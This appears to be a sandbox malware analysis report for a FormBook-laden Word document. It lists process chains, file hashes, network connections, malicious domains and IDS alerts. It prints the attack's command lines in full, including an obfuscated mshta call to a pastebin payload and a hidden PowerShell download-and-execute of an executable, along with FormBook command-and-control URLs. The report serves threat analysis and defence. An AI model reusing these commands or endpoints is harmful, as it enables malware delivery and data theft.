File name: | ORDER LIST.doc |
Full analysis: | https://app.any.run/tasks/54840fb4-00c1-4580-8cff-91df6cfa3a30 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | January 18, 2019, 02:04:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | A3AC2590B7E47B80769F8C97A479D9AC |
SHA1: | 39DBA747EFC477A45D9B46292DCB57DF9B8768FF |
SHA256: | B60AE7B30DA0309A70C35B0EF86290C375F278F48A5648F1886031BBA555149D |
SSDEEP: | 96:1BxVmT0Uz5YOFaDQnQyeVsM2w73LzrRo072spXzmiSLUKhkNY5Tyv3aKZLqX2lAi:Peoa+Occd22w/9VXCiWVOKTatai |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ORDER LIST.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3404 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
4080 | cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/7QgApPm3 | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2556 | mSHta https://pastebin.com/raw/7QgApPm3 | C:\Windows\system32\mshta.exe | cMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3660 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://www.tibetsaveandcare.org/sites/default/files/king4.exe',$env:Temp+'\IGLZOC.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\IGLZOC.Exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3100 | "C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe" | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe | — | powershell.exe |
User: admin Company: SUPERSESSION9 Integrity Level: MEDIUM Description: recombination Exit code: 0 Version: 2.02.0007 | ||||
2920 | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe" | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe | — | IGLZOC.Exe |
User: admin Company: SUPERSESSION9 Integrity Level: MEDIUM Description: recombination Exit code: 0 Version: 2.02.0007 | ||||
2708 | "C:\Windows\System32\msiexec.exe" | C:\Windows\System32\msiexec.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2872 | /c del "C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe" | C:\Windows\System32\cmd.exe | — | msiexec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
284 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE7D4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L7F6RJPPYOGQRB2NITU5.temp | — | |
MD5:— | SHA256:— | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$DER LIST.doc | pgc | |
MD5:64CD440EA9B3A16DD86DB0F1BD96BF70 | SHA256:3BE16D0EEAF814A3CACFCDA1A408C19DEEE8EA503888752EE14D4F86013FE70D | |||
3100 | IGLZOC.Exe | C:\Users\admin\AppData\Local\Temp\~DF538D7964AD314682.TMP | binary | |
MD5:F751836DEAD1F8E06015EDB43E1B0666 | SHA256:13D455B0528D2BAF040400F84E8F1BC192003077A66C03B87A1412D6B08CDDE9 | |||
3660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe | executable | |
MD5:2B5FF14000782024F817A7CC0A096180 | SHA256:86102FC2A19EF57922E19C798CB9CEFB92D5011D8B40F9B568066680C99029C0 | |||
3896 | DllHost.exe | C:\Program Files\Kxpcdann\win9r8tzl.exe | executable | |
MD5:2B5FF14000782024F817A7CC0A096180 | SHA256:86102FC2A19EF57922E19C798CB9CEFB92D5011D8B40F9B568066680C99029C0 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2F778CCCCEFC881595E02404ED7E04FB | SHA256:2DC8F82D637DF1C2EB793718FFEDAAA61D9DD48F1AA2E8E25C5F5D6D2C812042 | |||
3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f39b.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2556 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:F51935F2ADD1D6E2AAB822E3E4310F3C | SHA256:3514483A997574F6A9C04C8E1D0D5F67352D9D10FC00444282002ADBEC1C6216 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3660 | powershell.exe | GET | 200 | 213.186.33.40:80 | http://www.tibetsaveandcare.org/sites/default/files/king4.exe | FR | executable | 538 Kb | malicious |
284 | explorer.exe | POST | — | 217.160.0.85:80 | http://www.knowell-online.com/ki/ | DE | — | — | malicious |
284 | explorer.exe | GET | 302 | 23.20.239.12:80 | http://www.andytrains.com/ki/?5j=UHjienhsSDrUenCC5TStA0y6Ue+940OULrM3MbvLD/50GF0v+4fHgk9jUud1VcQr46mddg==&Up8l=cVTpThZp90h404&sql=1 | US | html | 186 b | shared |
284 | explorer.exe | GET | 400 | 198.185.159.144:80 | http://www.livelymccabe.com/ki/?5j=8LB5lk2it2PX6c+HtvgvYAYiso1NBLtOROwOp6fyvzxAkeHERWp3InXXx5MjQg4m4jghiw==&Up8l=cVTpThZp90h404 | US | html | 378 b | malicious |
284 | explorer.exe | GET | 302 | 23.20.239.12:80 | http://www.salmonidata.com/ki/?5j=ds8gVWoSLZp0ZDBJEyK8qnrKsAqY9VizRIFuJtahimP0plrD5mM4WB8v5utVk3mfNMaSBA==&Up8l=cVTpThZp90h404&sql=1 | US | html | 187 b | shared |
284 | explorer.exe | POST | — | 217.160.0.85:80 | http://www.knowell-online.com/ki/ | DE | — | — | malicious |
284 | explorer.exe | POST | — | 54.243.199.87:80 | http://www.countrysidekim.com/ki/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.andytrains.com/ki/ | US | — | — | shared |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.salmonidata.com/ki/ | US | — | — | shared |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.salmonidata.com/ki/ | US | — | — | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2556 | mshta.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
284 | explorer.exe | 217.160.0.85:80 | www.knowell-online.com | 1&1 Internet SE | DE | malicious |
3660 | powershell.exe | 213.186.33.40:80 | www.tibetsaveandcare.org | OVH SAS | FR | malicious |
284 | explorer.exe | 198.185.159.144:80 | www.livelymccabe.com | Squarespace, Inc. | US | malicious |
284 | explorer.exe | 23.20.239.12:80 | www.andytrains.com | Amazon.com, Inc. | US | shared |
284 | explorer.exe | 54.243.199.87:80 | www.countrysidekim.com | Amazon.com, Inc. | US | malicious |
284 | explorer.exe | 199.192.23.212:80 | www.smaleg.com | — | US | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
www.tibetsaveandcare.org |
| malicious |
www.livelymccabe.com |
| malicious |
www.knowell-online.com |
| malicious |
www.entieval.com |
| unknown |
www.andytrains.com |
| shared |
www.salmonidata.com |
| shared |
www.smaleg.com |
| malicious |
www.mariaandjoesayido.com |
| unknown |
www.countrysidekim.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3660 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3660 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |